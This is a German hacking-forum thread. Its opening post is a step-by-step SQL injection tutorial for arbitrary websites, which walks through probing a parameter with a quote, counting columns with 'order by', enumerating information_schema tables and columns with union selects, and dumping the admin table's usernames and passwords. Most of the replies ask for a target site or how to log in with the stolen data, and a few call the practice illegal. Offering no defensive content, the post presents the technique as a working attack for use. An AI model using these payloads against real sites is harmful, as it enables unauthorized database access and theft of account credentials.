Register for your free account! | Forgot your password?

Go Back   elitepvpers > Off-Topics > Tutorials
You last visited: Today at 05:36

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



[Guide] Prüfen ob eine Seite per SQL Injection angreifbar ist.

Discussion on [Guide] Prüfen ob eine Seite per SQL Injection angreifbar ist. within the Tutorials forum part of the Off-Topics category.

Reply
 
Old   #1
 
elite*gold: 2
Join Date: Mar 2008
Posts: 827
Received Thanks: 157
[Guide] Prüfen ob eine Seite per SQL Injection angreifbar ist.

Achtung: Ich übernehme in keinster Weise Verantwortung dafür wenn ihr durch diesen Guide bei irgentwelchen Seiten was anstellt.

1) Um zu prüfen ob eine Seite per SQL Injection angreifbar ist müsst ihr einen Link finden der so aussieht:
Quote:
=1
Die Seite braucht ganz einfach nur ein = in den URL.
Bei der URL schreibt ihr noch ein ' dahinter, Bsp.:
Quote:
'
Wenn die Seite bzw. die Datenbank angreifbar ist, kriegt ihr eine MySQL Fehlermeldung so wie diese:
Quote:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29
Wenn die Seite aber normal geladen wird, heißt das das die Seite nicht über diese Methode angreifbar ist.

2) Nun müssen wir rausfinden wie viele "Reihen" in der Datenbank sind, dafür benutzen wir den "order by" Command. Dafür schreiben wir einfach "order by 1--", "order by 2--" hinter die URL, und zwar solange bis ihr einen Seitenfehler erhaltet, Bsp. :
Quote:
order by 1--
order by 2--
order by 3--
order by 4--
order by 5--
Wenn wir beispielsweise bei "order by 5--" einen Fehler bekommen, heißt das, das die Datenbank, 4 "Reihen" hat.

3) Nun benutzen wir den "union" Command um zu sehen welchen Reihen angreifbar sind, dazu schreiben wir hinter die URL,
Quote:
union all select (Anzahl der Reihen)--,
Beispiel:
Quote:
union all select 1,2,3,4--
Wenn die Seite geladen hat, solltet ihr irgentwo auf der Seite Zahlen sehen, z.b. 2 und 3, das heißt, die Reihen 2 und 3 sind angreifbar.

4) Jetzt müssen wir die MySQL Version, User und Datenbank finden, das machen wir mit den folgenden Commands:
Quote:
user()
database()
version()
oder
Quote:
@@user
@@version
@@database
Das würde dann beispielsweise so aussehen:
Quote:
union all select 1,user(),version(),4--
Wenn die Seite geladen hatt sehen wir dann die Version, den MySQL User und den Namen der Datenbank.

5) Nun ist es unser Ziel alle Reihennamen zu erfahren, das machen wir mit dem folgenden Command:
Quote:
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
Die URL sieht dann so aus:
Quote:
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
table_name müsst ihr mit dem Namen der Reihe ersetzen die angreifbar ist.

6) Nun wollen wir die Tabellenamen haben, das machen wir mit folgenden Command:
Quote:
union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
Die URL sieht dann so aus:
Quote:
union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
7) Zu letzt wollen wir das die Seite den Inhalt ausspuckt, z.B. von "username" und "password" von "admin", dazu haben wir diesen Command:
Quote:
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
Die URL sieht dann so aus:
Quote:
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
Falls ihr alles richtig gemacht habt, solltet ihr die Daten des Admins sehen (je nach Seite kommt das PW in MD5 raus).

Ich hoffe euch hatt mein TuT gefallen.


Gruß Kia
.Kia. is offline  
Thanks
5 Users
Old 10/23/2010, 12:31   #2
 
.SaFe's Avatar
 
elite*gold: 19
Join Date: Jun 2009
Posts: 3,465
Received Thanks: 1,484
danke^^ kannst du mir eine seite geben , wo ich es testen kann?
.SaFe is offline  
Old 10/23/2010, 13:33   #3
 
elite*gold: 2
Join Date: Mar 2008
Posts: 827
Received Thanks: 157
Kenn leider keine :/

EDIT:

Hier:
.Kia. is offline  
Old 10/23/2010, 16:58   #4
 
.SaFe's Avatar
 
elite*gold: 19
Join Date: Jun 2009
Posts: 3,465
Received Thanks: 1,484
da kommt internal server rror.. hmm hast ICQ?
.SaFe is offline  
Old 10/23/2010, 17:41   #5
 
elite*gold: 0
Join Date: Jun 2009
Posts: 853
Received Thanks: 270
ist eh illegal von dem her
gallexme is offline  
Old 10/23/2010, 18:26   #6
 
elite*gold: 2
Join Date: Mar 2008
Posts: 827
Received Thanks: 157
Da soll ja auch en Error kommen, les es dir nochmal gut durch, Support gebe ich keinen.
.Kia. is offline  
Old 10/23/2010, 19:29   #7
 
.SaFe's Avatar
 
elite*gold: 19
Join Date: Jun 2009
Posts: 3,465
Received Thanks: 1,484
ja da kommt kein error nur 404... warum gibst keinen support?=O hab noch mehr fragen xD
.SaFe is offline  
Old 10/24/2010, 16:12   #8
 
Jonni8's Avatar
 
elite*gold: 4
Join Date: Jun 2010
Posts: 239
Received Thanks: 15
An sich zwar ganz gut gemacht, aber ich konnte dem irgentwie nicht ganz folgen...
Screens?
-> kannst ja URL und alles andere informative unkenntlich machen
->> nur eben das man sieht wie die Seite inhaltlich aussehen soll.
Jonni8 is offline  
Old 10/28/2010, 20:14   #9
 
Vizon's Avatar
 
elite*gold: 0
Join Date: Oct 2010
Posts: 381
Received Thanks: 41
Befasst euch erstmal mit HTML/PHP/MySQL bevor ihr euch an sowas ranwagt, sonst versteht ihr den ganzen Ablauf und Aufbau null.
Vizon is offline  
Old 10/28/2010, 20:18   #10
 
HighLvleR's Avatar
 
elite*gold: 94
Join Date: Feb 2008
Posts: 2,186
Received Thanks: 832
Das ist SQL Injection und nicht legal oder?
Man greifft auf Daten zu auf die man kein Recht hat.
HighLvleR is offline  
Old 10/28/2010, 20:29   #11
 
Vizon's Avatar
 
elite*gold: 0
Join Date: Oct 2010
Posts: 381
Received Thanks: 41
Code:
SQL-Injections sind Lücken, welche bei unsicheren Datenbankabfragen entstehen können.
Der Bentuzer kann bei einem solchen Bug, selber den entsprechenden SQL
Code in die schon bestehende Abfrage injizieren. So könnte er sich z.B. die
enthaltenen User ausgeben lassen, welche bei der Authentifizierung benötigt werden.
Erklärt alles oder?
Vizon is offline  
Old 10/28/2010, 20:32   #12
 
elite*gold: 0
Join Date: Oct 2010
Posts: 59
Received Thanks: 25
SQLi ist illegal. ausser natürlich ihr machts bei euren eigenen seiten
angelboter12 is offline  
Old 10/28/2010, 21:21   #13
 
Vizon's Avatar
 
elite*gold: 0
Join Date: Oct 2010
Posts: 381
Received Thanks: 41
Hinzu kommt, dass das Tutorial recht "lasch" geschrieben ist.

Hättest mehr auf die "befehle" eingehen können und evtl. noch schreiben sollen, wie man sich dagegen schützen kann.
Vizon is offline  
Old 10/28/2010, 21:56   #14
 
elite*gold: 0
Join Date: Jun 2010
Posts: 388
Received Thanks: 334
Und wo kann man sich dann mit den Daten einloggen?
PinkHacker is offline  
Old 10/28/2010, 22:13   #15
 
Vizon's Avatar
 
elite*gold: 0
Join Date: Oct 2010
Posts: 381
Received Thanks: 41
Auf der jeweiligen Seite?
Vizon is offline  
Reply


Similar Threads Similar Threads
[Guide] Client Based Packet Injection in Silkroad
08/01/2013 - SRO Coding Corner - 29 Replies
This article is a special one! Thanks to clockwork for letting me share some knowledge I learned from him in the past. This information is still relevant and useful for Silkroad, but as I will write about, might be too much work for the benefits. Client Based Packet Injection in Silkroad I. Purpose Welcome to the fourth guide in my series! I would like to take this time to thank clockwork for allowing me to write a guide based on his approach for performing client based packet...
Eine elitepvp seite
10/20/2010 - WarRock Hacks, Bots, Cheats & Exploits - 5 Replies
Close...
brauche seite wo man hacks auf trojaner prüfen kann
09/09/2008 - Metin2 - 6 Replies
hi könnt ihr pls den link für die seite da reintun



All times are GMT +1. The time now is 05:38.


Powered by vBulletin®
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2026 elitepvpers All Rights Reserved.